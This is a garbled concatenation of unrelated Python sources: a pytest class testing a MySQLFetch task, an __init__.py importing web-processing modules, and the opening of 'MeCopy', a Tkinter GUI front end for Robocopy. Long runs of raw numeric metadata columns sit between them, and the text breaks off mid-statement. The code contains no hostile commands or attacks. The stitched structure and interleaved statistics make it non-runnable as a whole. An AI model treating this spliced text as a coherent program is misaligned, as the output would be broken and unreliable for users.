class TestMySQLFetch:
def test_construction(self):
task = MySQLFetch(db_name="test", user="test", password="test", host="test")
assert task.fetch == "one"
def test_query_string_must_be_provided(self):
task = MySQLFetch(db_name="test", user="test", password="test", host="test")
with pytest.raises(ValueError, match="A query string must be provided"):
task.run()
def test_bad_fetch_param_raises(self):
task = MySQLFetch(db_name="test", user="test", password="test", host="test")
with pytest.raises(
ValueError,
match=r"The 'fetch' parameter must be one of the following - \('one', 'many', 'all'\)",
):
task.run(query="SELECT * FROM some_table", fetch="not a valid parameter")
def test_construction_with_cursor_type_str(self):
task = MySQLFetch(
db_name="test",
user="test",
password="test",
host="test",
cursor_type="dictcursor",
)
assert task.cursor_type == "dictcursor"
def test_construction_with_cursor_type_class(self):
task = MySQLFetch(
db_name="test",
user="test",
password="test",
host="test",
cursor_type=pymysql.cursors.DictCursor,
)
assert task.cursor_type == pymysql.cursors.DictCursor
def test_unsupported_cursor_type_str_param_raises(self):
cursor_type = "unsupportedcursor"
task = MySQLFetch(db_name="test", user="test", password="test", host="test")
with pytest.raises(
TypeError,
match=rf"'cursor_type' should be one of \['cursor', 'dictcursor', 'sscursor', 'ssdictcursor'\] or a full cursor class, got {cursor_type}",
):
task.run(query="SELECT * FROM some_table", cursor_type=cursor_type)
def test_bad_cursor_type_param_type_raises(self):
task = MySQLFetch(db_name="test", user="test", password="test", host="test")
with pytest.raises(
TypeError,
match=rf"'cursor_type' should be one of \['cursor', 'dictcursor', 'sscursor', 'ssdictcursor'\] or a full cursor class, got \['cursor'\]",
):
task.run(query="SELECT * FROM some_table", cursor_type=["cursor"])
def test_run_args_used_over_init_args(self, monkeypatch):
mock_connect = MagicMock()
monkeypatch.setattr("pymysql.connect", mock_connect)
task = MySQLFetch(
db_name="test", user="test", password="initpassword", host="test"
)
task.run(query="select * from users", password="password_from_secret")
assert mock_connect.call_args[1]["password"] == "password_from_secret"
| 39.229167
| 150
| 0.635953
| 445
| 3,766
| 5.177528
| 0.193258
| 0.065104
| 0.047743
| 0.06684
| 0.823351
| 0.764323
| 0.735677
| 0.722222
| 0.712674
| 0.684896
| 0
| 0.00139
| 0.235794
| 3,766
| 95
| 151
| 39.642105
| 0.799166
| 0
| 0
| 0.605263
| 0
| 0.039474
| 0.237387
| 0
| 0
| 0
| 0
| 0
| 0.078947
| 1
| 0.144737
| false
| 0.197368
| 0.052632
| 0
| 0.223684
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
b7aebd54c20d3154cab1dfe3274a13e135f6b8d8
| 400
|
py
|
Python
|
Platforms/Web/Processing/__init__.py
|
The-CJ/Phaazebot
|
83a9563d210718071d4e2cdcca3b212c87abaf51
|
[
"MIT"
] | 2
|
2017-09-14T08:07:55.000Z
|
2021-05-18T05:05:05.000Z
|
Platforms/Web/Processing/__init__.py
|
The-CJ/Phaazebot
|
83a9563d210718071d4e2cdcca3b212c87abaf51
|
[
"MIT"
] | 111
|
2018-04-15T14:32:14.000Z
|
2021-03-28T21:06:29.000Z
|
Platforms/Web/Processing/__init__.py
|
The-CJ/Phaazebot
|
83a9563d210718071d4e2cdcca3b212c87abaf51
|
[
"MIT"
] | 1
|
2018-04-15T13:24:44.000Z
|
2018-04-15T13:24:44.000Z
|
import Platforms.Web.Processing.Account as Account
import Platforms.Web.Processing.Admin as Admin
import Platforms.Web.Processing.Api as Api
import Platforms.Web.Processing.Discord as Discord
import Platforms.Web.Processing.Twitch as Twitch
import Platforms.Web.Processing.errors as errors
import Platforms.Web.Processing.mainsite as mainsite
import Platforms.Web.Processing.webcontent as webcontent
| 44.444444
| 56
| 0.86
| 56
| 400
| 6.142857
| 0.232143
| 0.348837
| 0.418605
| 0.651163
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.08
| 400
| 9
| 56
| 44.444444
| 0.934783
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
b7f812758c108f6bbf0f3ac2fa32b49e9949e4f6
| 134,671
|
py
|
Python
|
main.py
|
w4rexx/MeCopy
|
25e48439b654e3afab053c3b015ac2d97ad8c7f2
|
[
"MIT"
] | null | null | null |
main.py
|
w4rexx/MeCopy
|
25e48439b654e3afab053c3b015ac2d97ad8c7f2
|
[
"MIT"
] | null | null | null |
main.py
|
w4rexx/MeCopy
|
25e48439b654e3afab053c3b015ac2d97ad8c7f2
|
[
"MIT"
] | 1
|
2021-12-21T08:56:10.000Z
|
2021-12-21T08:56:10.000Z
|
"""
MeCopy (Modular Extension Copy) It is a GUI for Robocopy based on independent modules
in which you can copy, move or delete files on your computer at the same time without
any module interfering with each other.
Copyright© W4rex / Alejandro Duarte
Github: https://github.com/w4rexx/MeCopy
"""
import sys
import os
import tkinter as tk
import shutil
import errno
import os.path
import posixpath
import fnmatch
import time
import webbrowser
import win32api
import pywintypes
import threading
import glob
import os
import shutil
from fnmatch import _compile_pattern
from configparser import ConfigParser
from tkscrolledframe import ScrolledFrame
from tkinter import ttk
from tkinter import filedialog
from tkinter import messagebox
from os.path import isdir, join
from shutil import copytree
from os import rmdir, walk
from ast import literal_eval
from PIL import ImageTk, Image
from subprocess import call
from ttkbootstrap import Style
# Monkey patch to make fnmatch accept a tuple of patterns.
def filter_patterns(names, pat):
"""Return the subset of the list NAMES that match PAT."""
result = []
pats = pat if isinstance(pat, tuple) else (pat,)
matches = []
for pat in pats:
pat = os.path.normcase(pat)
matches.append(_compile_pattern(pat))
if os.path is posixpath:
# normcase on posix is NOP. Optimize it away from the loop.
for name in names:
for match in matches:
if match(name):
result.append(name)
break
else:
for name in names:
for match in matches:
if match(os.path.normcase(name)):
result.append(name)
break
return result
fnmatch.filter = filter_patterns
# End of monkey patch for fnmatch
try:
os.makedirs('logs')
except OSError as e:
if e.errno != errno.EEXIST:
raise
parser = ConfigParser()
parser.read('config.ini')
Version = ("(v.1.0)")
def raise_frame(frame):
frame.tkraise()
root = tk.Tk()
root.title("MeCopy")
root.config(bg="#dbdbdb")
root.geometry("1280x670+35+0")
root.resizable(False, False)
root.iconbitmap("icon.ico")
Move_Screen = tk.Frame(root)
Move_Screen.config(bg="#dbdbdb")
Move_Screen.place(x=0, y=0, width=1280, height=667)
Delete_Menu_Screen = tk.Frame(root)
Delete_Menu_Screen.config(bg="#dbdbdb")
Delete_Menu_Screen.place(x=0, y=0, width=1280, height=667)
Move_Frame = tk.Frame(Move_Screen)
Move_Frame.config(bg="#dbdbdb", width=1280, height=667, padx=55, pady=20)
Move_Frame.grid(row=0, column=0)
Delete_Frame = tk.Frame(Delete_Menu_Screen)
Delete_Frame.config(bg="#dbdbdb", width=1280, height=667, padx=55, pady=20)
Delete_Frame.grid(row=0, column=0)
s = ttk.Style(root)
s.theme_use('clam')
s.configure('flat.TButton', padding=1)
estyle = ttk.Style()
estyle.element_create("plain.field", "from", "clam")
estyle.layout("EntryStyle.TEntry",
[('Entry.plain.field', {'children': [(
'Entry.background', {'children': [(
'Entry.padding', {'children': [(
'Entry.textarea', {'sticky': 'nswe'})],
'sticky': 'nswe'})], 'sticky': 'nswe'})],
'border': '1', 'sticky': 'nswe'})])
estyle.configure("EntryStyle.TEntry",
background="#dbdbdb",
foreground="#373636",
fieldbackground="grey", relief='flat',
highlightthickness=1,
highlightbackground="#ec3c3c",
selectbackground="#357ebd")
estyle.layout("EntryStyle.TEntry_Paths",
[('Entry.plain.field', {'children': [(
'Entry.background', {'children': [(
'Entry.padding', {'children': [(
'Entry.textarea', {'sticky': 'nswe'})],
'sticky': 'nswe'})], 'sticky': 'nswe'})],
'border': '0', 'sticky': 'nswe'})])
estyle.configure("EntryStyle.TEntry_Paths",
background="#dbdbdb", foreground="#3671be")
menubar = tk.Menu(root)
root.config(menu=menubar)
filemenu = tk.Menu(menubar, tearoff=0)
filemenu.add_command(label="Exit", command=root.quit)
helpmenu = tk.Menu(menubar, tearoff=0)
helpmenu.add_command(label="About...", command=lambda: [info_window()])
menubar.add_cascade(label="File", menu=filemenu)
menubar.add_cascade(label="Help", menu=helpmenu)
class EntryEx(ttk.Entry):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.menu = tk.Menu(self, tearoff=False)
self.menu.add_command(label="Copy", command=self.popup_copy)
self.menu.add_command(label="Cut", command=self.popup_cut)
self.menu.add_separator()
self.menu.add_command(label="Paste", command=self.popup_paste)
self.bind("<Button-3>", self.display_popup)
def display_popup(self, event):
self.menu.post(event.x_root, event.y_root)
def popup_copy(self):
self.event_generate("<<Copy>>")
def popup_cut(self):
self.event_generate("<<Cut>>")
def popup_paste(self):
self.event_generate("<<Paste>>")
def callback(url):
webbrowser.open_new(url)
def callback_2(url):
webbrowser.open_new(url)
def info_window():
window = tk.Toplevel(root)
window.title("MeCopy")
window.config(bg="#dbdbdb")
window.geometry("500x200+420+300")
window.resizable(False, False)
window.iconbitmap("icon.ico")
Logo_Img_Open = ImageTk.PhotoImage(Image.open("Images/logo.png"))
Logo = tk.Label(window, bg="#dbdbdb", image=Logo_Img_Open)
Logo.place(x=10, y=120)
Logo.image = Logo_Img_Open
link1 = tk.Label(window, text="Contact", fg="blue",
bg="#dbdbdb", cursor="hand2")
link1.place(x=22, y=10)
link1.bind(
"<Button-1>", lambda e: callback_2(" https://github.com/w4rexx"))
Info_Version = tk.Label(window, bg="#dbdbdb", fg="#382d2b",
text="MeCopy " + Version).place(x=204, y=20)
Info_Description = tk.Label(window, bg="#dbdbdb", fg="#382d2b",
text="MeCopy (Modular Extension Copy) It is a GUI for Robocopy based on independent modules in which you can copy, move or delete files on your computer at the same time without any module interfering with each other.", wraplength=350).place(x=85, y=55)
Info_Dev = tk.Label(window, bg="#dbdbdb", fg="#382d2b",
text="Copyright© W4rex / Alejandro Duarte").place(x=290, y=177)
Exit_Button = ttk.Button(window, text="Close",
command=window.destroy).place(x=210, y=140)
# MOVE_MODULES_TITLE
Move_Module_Name_1 = tk.StringVar()
Entry_Path_1 = EntryEx(Move_Frame, font="Helvetica 10 bold", width=27,
style="EntryStyle.TEntry_Paths", textvariable=Move_Module_Name_1).place(x=165, y=0)
Move_Module_Name_1.set(parser.get("Path_Names", "path_name_1"))
Move_Module_Name_2 = tk.StringVar()
Entry_Path_2 = EntryEx(Move_Frame, font="Helvetica 10 bold", width=27,
style="EntryStyle.TEntry_Paths", textvariable=Move_Module_Name_2).place(x=165, y=112)
Move_Module_Name_2.set(parser.get("Path_Names", "path_name_2"))
Move_Module_Name_3 = tk.StringVar()
Entry_Path_3 = EntryEx(Move_Frame, font="Helvetica 10 bold", width=27,
style="EntryStyle.TEntry_Paths", textvariable=Move_Module_Name_3).place(x=165, y=225)
Move_Module_Name_3.set(parser.get("Path_Names", "path_name_3"))
Move_Module_Name_4 = tk.StringVar()
Entry_Path_4 = EntryEx(Move_Frame, font="Helvetica 10 bold", width=27,
style="EntryStyle.TEntry_Paths", textvariable=Move_Module_Name_4).place(x=165, y=345)
Move_Module_Name_4.set(parser.get("Path_Names", "path_name_4"))
Move_Module_Name_5 = tk.StringVar()
Entry_Path_5 = EntryEx(Move_Frame, font="Helvetica 10 bold", width=27,
style="EntryStyle.TEntry_Paths", textvariable=Move_Module_Name_5).place(x=165, y=462)
Move_Module_Name_5.set(parser.get("Path_Names", "path_name_5"))
Move_Module_Name_6 = tk.StringVar()
Entry_Path_6 = EntryEx(Move_Frame, font="Helvetica 10 bold", width=27,
style="EntryStyle.TEntry_Paths", textvariable=Move_Module_Name_6).place(x=755, y=0)
Move_Module_Name_6.set(parser.get("Path_Names", "path_name_6"))
Move_Module_Name_7 = tk.StringVar()
Entry_Path_7 = EntryEx(Move_Frame, font="Helvetica 10 bold", width=27,
style="EntryStyle.TEntry_Paths", textvariable=Move_Module_Name_7).place(x=755, y=112)
Move_Module_Name_7.set(parser.get("Path_Names", "path_name_7"))
Move_Module_Name_8 = tk.StringVar()
Entry_Path_8 = EntryEx(Move_Frame, font="Helvetica 10 bold", width=27,
style="EntryStyle.TEntry_Paths", textvariable=Move_Module_Name_8).place(x=755, y=225)
Move_Module_Name_8.set(parser.get("Path_Names", "path_name_8"))
Move_Module_Name_9 = tk.StringVar()
Entry_Path_9 = EntryEx(Move_Frame, font="Helvetica 10 bold", width=27,
style="EntryStyle.TEntry_Paths", textvariable=Move_Module_Name_9).place(x=755, y=345)
Move_Module_Name_9.set(parser.get("Path_Names", "path_name_9"))
Move_Module_Name_10 = tk.StringVar()
Entry_Path_10 = EntryEx(Move_Frame, font="Helvetica 10 bold", width=27,
style="EntryStyle.TEntry_Paths", textvariable=Move_Module_Name_10).place(x=755, y=462)
Move_Module_Name_10.set(parser.get("Path_Names", "path_name_10"))
# MOVE_MODULES_TITLE_END
# MOVE_MODULES_SRC_PETITION
def Get_Src_Path_1():
Src_Path_1_Selected = filedialog.askdirectory()
Src_Path_1.set(Src_Path_1_Selected)
Src_Path_1 = tk.StringVar()
Src_Path_1.set(parser.get("Paths_Src", "path_1"))
def Get_Src_Path_2():
Src_Path_2_Selected = filedialog.askdirectory()
Src_Path_2.set(Src_Path_2_Selected)
Src_Path_2 = tk.StringVar()
Src_Path_2.set(parser.get("Paths_Src", "path_2"))
def Get_Src_Path_3():
Src_Path_3_Selected = filedialog.askdirectory()
Src_Path_3.set(Src_Path_3_Selected)
Src_Path_3 = tk.StringVar()
Src_Path_3.set(parser.get("Paths_Src", "path_3"))
def Get_Src_Path_4():
Src_Path_4_Selected = filedialog.askdirectory()
Src_Path_4.set(Src_Path_4_Selected)
Src_Path_4 = tk.StringVar()
Src_Path_4.set(parser.get("Paths_Src", "path_4"))
def Get_Src_Path_5():
Src_Path_5_Selected = filedialog.askdirectory()
Src_Path_5.set(Src_Path_5_Selected)
Src_Path_5 = tk.StringVar()
Src_Path_5.set(parser.get("Paths_Src", "path_5"))
def Get_Src_Path_6():
Src_Path_6_Selected = filedialog.askdirectory()
Src_Path_6.set(Src_Path_6_Selected)
Src_Path_6 = tk.StringVar()
Src_Path_6.set(parser.get("Paths_Src", "path_6"))
def Get_Src_Path_7():
Src_Path_7_Selected = filedialog.askdirectory()
Src_Path_7.set(Src_Path_7_Selected)
Src_Path_7 = tk.StringVar()
Src_Path_7.set(parser.get("Paths_Src", "path_7"))
def Get_Src_Path_8():
Src_Path_8_Selected = filedialog.askdirectory()
Src_Path_8.set(Src_Path_8_Selected)
Src_Path_8 = tk.StringVar()
Src_Path_8.set(parser.get("Paths_Src", "path_8"))
def Get_Src_Path_9():
Src_Path_9_Selected = filedialog.askdirectory()
Src_Path_9.set(Src_Path_9_Selected)
Src_Path_9 = tk.StringVar()
Src_Path_9.set(parser.get("Paths_Src", "path_9"))
def Get_Src_Path_10():
Src_Path_10_Selected = filedialog.askdirectory()
Src_Path_10.set(Src_Path_10_Selected)
Src_Path_10 = tk.StringVar()
Src_Path_10.set(parser.get("Paths_Src", "path_10"))
Src_Title_1 = tk.Label(Move_Frame, text="Search in:", fg="#382d2b",
bg="#dbdbdb", font=("Arial", "12", "bold")).place(x=64, y=19)
Patch_1_Entry = EntryEx(Move_Frame, style="EntryStyle.TEntry",
textvariable=Src_Path_1).place(x=155, y=22)
btnFind_Path_1 = ttk.Button(Move_Frame, text="Search",
style="flat.TButton", command=Get_Src_Path_1).place(x=282, y=21)
Src_Title_2 = tk.Label(Move_Frame, text="Search in:", fg="#382d2b",
bg="#dbdbdb", font=("Arial", "12", "bold")).place(x=64, y=130)
Patch_2_Entry = EntryEx(Move_Frame, style="EntryStyle.TEntry",
textvariable=Src_Path_2).place(x=155, y=133)
btnFind_Path_2 = ttk.Button(Move_Frame, text="Search",
style="flat.TButton", command=Get_Src_Path_2).place(x=282, y=132)
Src_Title_3 = tk.Label(Move_Frame, text="Search in:", fg="#382d2b",
bg="#dbdbdb", font=("Arial", "12", "bold")).place(x=64, y=247)
Patch_3_Entry = EntryEx(Move_Frame, style="EntryStyle.TEntry",
textvariable=Src_Path_3).place(x=155, y=250)
btnFind_Path_3 = ttk.Button(Move_Frame, text="Search",
style="flat.TButton", command=Get_Src_Path_3).place(x=282, y=249)
Src_Title_4 = tk.Label(Move_Frame, text="Search in:", fg="#382d2b",
bg="#dbdbdb", font=("Arial", "12", "bold")).place(x=64, y=365)
Patch_4_Entry = EntryEx(Move_Frame, style="EntryStyle.TEntry",
textvariable=Src_Path_4).place(x=155, y=369)
btnFind_Path_4 = ttk.Button(Move_Frame, text="Search",
style="flat.TButton", command=Get_Src_Path_4).place(x=282, y=368)
Src_Title_5 = tk.Label(Move_Frame, text="Search in:", fg="#382d2b",
bg="#dbdbdb", font=("Arial", "12", "bold")).place(x=64, y=481)
Patch_5_Entry = EntryEx(Move_Frame, style="EntryStyle.TEntry",
textvariable=Src_Path_5).place(x=155, y=485)
btnFind_Path_5 = ttk.Button(Move_Frame, text="Search",
style="flat.TButton", command=Get_Src_Path_5).place(x=282, y=484)
Src_Title_6 = tk.Label(Move_Frame, text="Search in:", fg="#382d2b",
bg="#dbdbdb", font=("Arial", "12", "bold")).place(x=654, y=19)
Patch_6_Entry = EntryEx(Move_Frame, style="EntryStyle.TEntry",
textvariable=Src_Path_6).place(x=746, y=22)
btnFind_Path_6 = ttk.Button(Move_Frame, text="Search",
style="flat.TButton", command=Get_Src_Path_6).place(x=873, y=21)
Src_Title_7 = tk.Label(Move_Frame, text="Search in:", fg="#382d2b",
bg="#dbdbdb", font=("Arial", "12", "bold")).place(x=654, y=130)
Patch_7_Entry = EntryEx(Move_Frame, style="EntryStyle.TEntry",
textvariable=Src_Path_7).place(x=746, y=133)
btnFind_Path_7 = ttk.Button(Move_Frame, text="Search",
style="flat.TButton", command=Get_Src_Path_7).place(x=873, y=132)
Src_Title_8 = tk.Label(Move_Frame, text="Search in:", fg="#382d2b",
bg="#dbdbdb", font=("Arial", "12", "bold")).place(x=654, y=247)
Patch_8_Entry = EntryEx(Move_Frame, style="EntryStyle.TEntry",
textvariable=Src_Path_8).place(x=746, y=250)
btnFind_Path_8 = ttk.Button(Move_Frame, text="Search",
style="flat.TButton", command=Get_Src_Path_8).place(x=873, y=249)
Src_Title_9 = tk.Label(Move_Frame, text="Search in:", fg="#382d2b",
bg="#dbdbdb", font=("Arial", "12", "bold")).place(x=654, y=365)
Patch_9_Entry = EntryEx(Move_Frame, style="EntryStyle.TEntry",
textvariable=Src_Path_9).place(x=746, y=369)
btnFind_Path_9 = ttk.Button(Move_Frame, text="Search",
style="flat.TButton", command=Get_Src_Path_9).place(x=873, y=368)
Src_Title_10 = tk.Label(Move_Frame, text="Search in:", fg="#382d2b",
bg="#dbdbdb", font=("Arial", "12", "bold")).place(x=654, y=481)
Patch_10_Entry = EntryEx(Move_Frame, style="EntryStyle.TEntry",
textvariable=Src_Path_10).place(x=746, y=485)
btnFind_Path_10 = ttk.Button(
Move_Frame, text="Search", style="flat.TButton", command=Get_Src_Path_10).place(x=873, y=484)
# MOVE_MODULES_SRC_PETITION_END
# MOVE_MODULES_DST_PETITION
def Get_Dst_Path_1():
folder_selected1 = filedialog.askdirectory()
Dst_Path_1.set(folder_selected1)
Dst_Path_1 = tk.StringVar()
Dst_Path_1.set(parser.get("Paths_Dst", "path_1"))
def Get_Dst_Path_2():
folder_selected2 = filedialog.askdirectory()
Dst_Path_2.set(folder_selected2)
Dst_Path_2 = tk.StringVar()
Dst_Path_2.set(parser.get("Paths_Dst", "path_2"))
def Get_Dst_Path_3():
folder_selected3 = filedialog.askdirectory()
Dst_Path_3.set(folder_selected3)
Dst_Path_3 = tk.StringVar()
Dst_Path_3.set(parser.get("Paths_Dst", "path_3"))
def Get_Dst_Path_4():
folder_selected4 = filedialog.askdirectory()
Dst_Path_4.set(folder_selected4)
Dst_Path_4 = tk.StringVar()
Dst_Path_4.set(parser.get("Paths_Dst", "path_4"))
def Get_Dst_Path_5():
folder_selected5 = filedialog.askdirectory()
Dst_Path_5.set(folder_selected5)
Dst_Path_5 = tk.StringVar()
Dst_Path_5.set(parser.get("Paths_Dst", "path_5"))
def Get_Dst_Path_6():
folder_selected6 = filedialog.askdirectory()
Dst_Path_6.set(folder_selected6)
Dst_Path_6 = tk.StringVar()
Dst_Path_6.set(parser.get("Paths_Dst", "path_6"))
def Get_Dst_Path_7():
folder_selected7 = filedialog.askdirectory()
Dst_Path_7.set(folder_selected7)
Dst_Path_7 = tk.StringVar()
Dst_Path_7.set(parser.get("Paths_Dst", "path_7"))
def Get_Dst_Path_8():
folder_selected8 = filedialog.askdirectory()
Dst_Path_8.set(folder_selected8)
Dst_Path_8 = tk.StringVar()
Dst_Path_8.set(parser.get("Paths_Dst", "path_8"))
def Get_Dst_Path_9():
folder_selected9 = filedialog.askdirectory()
Dst_Path_9.set(folder_selected9)
Dst_Path_9 = tk.StringVar()
Dst_Path_9.set(parser.get("Paths_Dst", "path_9"))
def Get_Dst_Path_10():
folder_selected10 = filedialog.askdirectory()
Dst_Path_10.set(folder_selected10)
Dst_Path_10 = tk.StringVar()
Dst_Path_10.set(parser.get("Paths_Dst", "path_10"))
Search_1_Path = tk.Label(Move_Frame, text="Send to:", fg="#382d2b",
bg="#dbdbdb", font=("Arial", "12", "bold")).place(x=77, y=46)
E2 = EntryEx(Move_Frame, style="EntryStyle.TEntry",
textvariable=Dst_Path_1).place(x=155, y=50)
btnFind2 = ttk.Button(Move_Frame, text="Search", style="flat.TButton",
command=Get_Dst_Path_1).place(x=282, y=49)
Search_2_Path = tk.Label(Move_Frame, text="Send to:", fg="#382d2b",
bg="#dbdbdb", font=("Arial", "12", "bold")).place(x=77, y=158)
E3 = EntryEx(Move_Frame, style="EntryStyle.TEntry",
textvariable=Dst_Path_2).place(x=155, y=162)
btnFind3 = ttk.Button(Move_Frame, text="Search", style="flat.TButton",
command=Get_Dst_Path_2).place(x=282, y=162)
Search_3_Path = tk.Label(Move_Frame, text="Send to:", fg="#382d2b",
bg="#dbdbdb", font=("Arial", "12", "bold")).place(x=77, y=274)
E4 = EntryEx(Move_Frame, style="EntryStyle.TEntry",
textvariable=Dst_Path_3).place(x=155, y=278)
btnFind4 = ttk.Button(Move_Frame, text="Search", style="flat.TButton",
command=Get_Dst_Path_3).place(x=282, y=277)
Search_4_Path = tk.Label(Move_Frame, text="Send to:", fg="#382d2b",
bg="#dbdbdb", font=("Arial", "12", "bold")).place(x=77, y=393)
E4 = EntryEx(Move_Frame, style="EntryStyle.TEntry",
textvariable=Dst_Path_4).place(x=155, y=397)
btnFind4 = ttk.Button(Move_Frame, text="Search", style="flat.TButton",
command=Get_Dst_Path_4).place(x=282, y=396)
Search_5_Path = tk.Label(Move_Frame, text="Send to:", fg="#382d2b",
bg="#dbdbdb", font=("Arial", "12", "bold")).place(x=77, y=508)
E5 = EntryEx(Move_Frame, style="EntryStyle.TEntry",
textvariable=Dst_Path_5).place(x=155, y=512)
btnFind5 = ttk.Button(Move_Frame, text="Search", style="flat.TButton",
command=Get_Dst_Path_5).place(x=282, y=511)
Search_6_Path = tk.Label(Move_Frame, text="Send to:", fg="#382d2b",
bg="#dbdbdb", font=("Arial", "12", "bold")).place(x=670, y=47)
E6 = EntryEx(Move_Frame, style="EntryStyle.TEntry",
textvariable=Dst_Path_6).place(x=746, y=50)
btnFind6 = ttk.Button(Move_Frame, text="Search", style="flat.TButton",
command=Get_Dst_Path_6).place(x=873, y=49)
Search_7_Path = tk.Label(Move_Frame, text="Send to:", fg="#382d2b",
bg="#dbdbdb", font=("Arial", "12", "bold")).place(x=670, y=158)
E7 = EntryEx(Move_Frame, style="EntryStyle.TEntry",
textvariable=Dst_Path_7).place(x=746, y=162)
btnFind7 = ttk.Button(Move_Frame, text="Search", style="flat.TButton",
command=Get_Dst_Path_7).place(x=873, y=162)
Search_8_Path = tk.Label(Move_Frame, text="Send to:", fg="#382d2b",
bg="#dbdbdb", font=("Arial", "12", "bold")).place(x=670, y=274)
E8 = EntryEx(Move_Frame, style="EntryStyle.TEntry",
textvariable=Dst_Path_8).place(x=746, y=278)
btnFind8 = ttk.Button(Move_Frame, text="Search", style="flat.TButton",
command=Get_Dst_Path_8).place(x=873, y=277)
Search_9_Path = tk.Label(Move_Frame, text="Send to:", fg="#382d2b",
bg="#dbdbdb", font=("Arial", "12", "bold")).place(x=670, y=393)
E9 = EntryEx(Move_Frame, style="EntryStyle.TEntry",
textvariable=Dst_Path_9).place(x=746, y=397)
btnFind9 = ttk.Button(Move_Frame, text="Search", style="flat.TButton",
command=Get_Dst_Path_9).place(x=873, y=396)
Search_10_Path = tk.Label(Move_Frame, text="Send to:", fg="#382d2b",
bg="#dbdbdb", font=("Arial", "12", "bold")).place(x=670, y=508)
E10 = EntryEx(Move_Frame, style="EntryStyle.TEntry",
textvariable=Dst_Path_10).place(x=746, y=512)
btnFind10 = ttk.Button(Move_Frame, text="Search", style="flat.TButton",
command=Get_Dst_Path_10).place(x=873, y=511)
# MOVE_MODULES_DST_PETITION_END
# MOVE_MODULES_EXTENTIONS_REQUEST
Module_1_Extensions = tk.StringVar()
Ext_Search_1 = tk.Label(Move_Frame, text="Extensions", fg="#382d2b",
bg="#dbdbdb", font=("Arial", "12", "bold")).place(x=380, y=12)
Entry_File_1_Extensions = EntryEx(
Move_Frame, style="EntryStyle.TEntry", textvariable=Module_1_Extensions).place(x=370, y=37)
Module_1_Extensions.set(parser.get("Extensions", "Search_1"))
Module_2_Extensions = tk.StringVar()
Ext_Search_2 = tk.Label(Move_Frame, text="Extensions", fg="#382d2b",
bg="#dbdbdb", font=("Arial", "12", "bold")).place(x=380, y=123)
Entry_File_2_Extensions = EntryEx(
Move_Frame, style="EntryStyle.TEntry", textvariable=Module_2_Extensions).place(x=370, y=150)
Module_2_Extensions.set(parser.get("Extensions", "Search_2"))
Module_3_Extensions = tk.StringVar()
Ext_Search_3 = tk.Label(Move_Frame, text="Extensions", fg="#382d2b",
bg="#dbdbdb", font=("Arial", "12", "bold")).place(x=380, y=241)
Entry_File_3_Extensions = EntryEx(
Move_Frame, style="EntryStyle.TEntry", textvariable=Module_3_Extensions).place(x=370, y=268)
Module_3_Extensions.set(parser.get("Extensions", "Search_3"))
Module_4_Extensions = tk.StringVar()
Ext_Search_4 = tk.Label(Move_Frame, text="Extensions", fg="#382d2b",
bg="#dbdbdb", font=("Arial", "12", "bold")).place(x=380, y=358)
Entry_File_4_Extensions = EntryEx(
Move_Frame, style="EntryStyle.TEntry", textvariable=Module_4_Extensions).place(x=370, y=384)
Module_4_Extensions.set(parser.get("Extensions", "Search_4"))
Module_5_Extensions = tk.StringVar()
Ext_Search_5 = tk.Label(Move_Frame, text="Extensions", fg="#382d2b",
bg="#dbdbdb", font=("Arial", "12", "bold")).place(x=380, y=475)
Entry_File_5_Extensions = EntryEx(
Move_Frame, style="EntryStyle.TEntry", textvariable=Module_5_Extensions).place(x=370, y=500)
Module_5_Extensions.set(parser.get("Extensions", "Search_5"))
Module_6_Extensions = tk.StringVar()
Ext_Search_6 = tk.Label(Move_Frame, text="Extensions", fg="#382d2b",
bg="#dbdbdb", font=("Arial", "12", "bold")).place(x=970, y=12)
Entry_File_6_Extensions = EntryEx(
Move_Frame, style="EntryStyle.TEntry", textvariable=Module_6_Extensions).place(x=960, y=37)
Module_6_Extensions.set(parser.get("Extensions", "Search_6"))
Module_7_Extensions = tk.StringVar()
Ext_Search_7 = tk.Label(Move_Frame, text="Extensions", fg="#382d2b",
bg="#dbdbdb", font=("Arial", "12", "bold")).place(x=970, y=123)
Entry_File_7_Extensions = EntryEx(
Move_Frame, style="EntryStyle.TEntry", textvariable=Module_7_Extensions).place(x=960, y=150)
Module_7_Extensions.set(parser.get("Extensions", "Search_7"))
Module_8_Extensions = tk.StringVar()
Ext_Search_8 = tk.Label(Move_Frame, text="Extensions", fg="#382d2b",
bg="#dbdbdb", font=("Arial", "12", "bold")).place(x=970, y=241)
Entry_File_8_Extensions = EntryEx(
Move_Frame, style="EntryStyle.TEntry", textvariable=Module_8_Extensions).place(x=960, y=268)
Module_8_Extensions.set(parser.get("Extensions", "Search_8"))
Module_9_Extensions = tk.StringVar()
Ext_Search_9 = tk.Label(Move_Frame, text="Extensions", fg="#382d2b",
bg="#dbdbdb", font=("Arial", "12", "bold")).place(x=970, y=358)
Entry_File_9_Extensions = EntryEx(
Move_Frame, style="EntryStyle.TEntry", textvariable=Module_9_Extensions).place(x=960, y=384)
Module_9_Extensions.set(parser.get("Extensions", "Search_9"))
Module_10_Extensions = tk.StringVar()
Ext_Search_10 = tk.Label(Move_Frame, text="Extensions", fg="#382d2b",
bg="#dbdbdb", font=("Arial", "12", "bold")).place(x=970, y=475)
Entry_File_10_Extensions = EntryEx(
Move_Frame, style="EntryStyle.TEntry", textvariable=Module_10_Extensions).place(x=960, y=500)
Module_10_Extensions.set(parser.get("Extensions", "Search_10"))
# MOVE_MODULES_EXTENTIONS_REQUEST_END
# TRANSFERING_TYPES
RadioValue_1 = tk.IntVar()
Copy_Files_Option_1 = tk.Radiobutton(
Move_Frame, text="Copy", bg="#dbdbdb", variable=RadioValue_1, value=0).place(x=500, y=35)
Move_Files_Option_1 = tk.Radiobutton(
